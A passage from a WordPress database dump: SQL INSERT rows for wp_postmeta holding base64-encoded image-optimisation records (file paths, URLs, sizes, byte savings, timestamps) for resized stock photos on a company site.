Xzk3NDAxNzMxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzMsInRpbWUiOjE0ODM1ODM4MzcsImlkIjo3MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjgzMSwidGltZSI6MTQ4MzU4Mzg0MSwiaWQiOjcxOH1d'); 
INSERT INTO `wp_postmeta` VALUES (30065, 712, 'wpfc_optimisation_reduction', '1221472'); 
INSERT INTO `wp_postmeta` VALUES (30066, 712, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAuanBnIiwid2lkdGgiOjI0NjgsImhlaWdodCI6MTY0MywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAuanBnIiwicmVkdWN0aW9uIjoxMjIxNDU5LCJ0aW1lIjoxNDgzNTgzODUxLCJpZCI6IjcxMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODUzLCJpZCI6NzEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mzg1NiwiaWQiOjcxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM4NTksImlkIjo3MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTE2MDB4MTA2NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM4NjIsImlkIjo3MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODY1LCJpZCI6NzEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mzg2NywiaWQiOjcxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM4NjksImlkIjo3MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODcyLCJpZCI6NzEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODc0LCJpZCI6NzEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODc2LCJpZCI6NzEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODc5LCJpZCI6NzEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODgxLCJpZCI6NzEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM1NDE5Njk3MC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNTQxOTY5NzAtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzU0MTk2OTcwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzODg0LCJpZCI6NzEyfV0='); 
INSERT INTO `wp_postmeta` VALUES (30067, 711, 'wpfc_optimisation_reduction', '10679'); 
INSERT INTO `wp_postmeta` VALUES (30068, 711, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4Mzg4OSwiaWQiOiI3MTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTgwLCJ0aW1lIjoxNDgzNTgzODkyLCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6ODA1LCJ0aW1lIjoxNDgzNTgzODk2LCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Nzc2LCJ0aW1lIjoxNDgzNTgzOTAwLCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyMzI5LCJ0aW1lIjoxNDgzNTgzOTA1LCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTgzLCJ0aW1lIjoxNDgzNTgzOTA4LCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTAzLCJ0aW1lIjoxNDgzNTgzOTEyLCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI0LCJ0aW1lIjoxNDgzNTgzOTE1LCJpZCI6NzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzYxLCJ0aW1lIjoxNDgzNTgzOTE5LCJpZCI6NzExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MzEsInRpbWUiOjE0ODM1ODM5MjIsImlkIjo3MTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5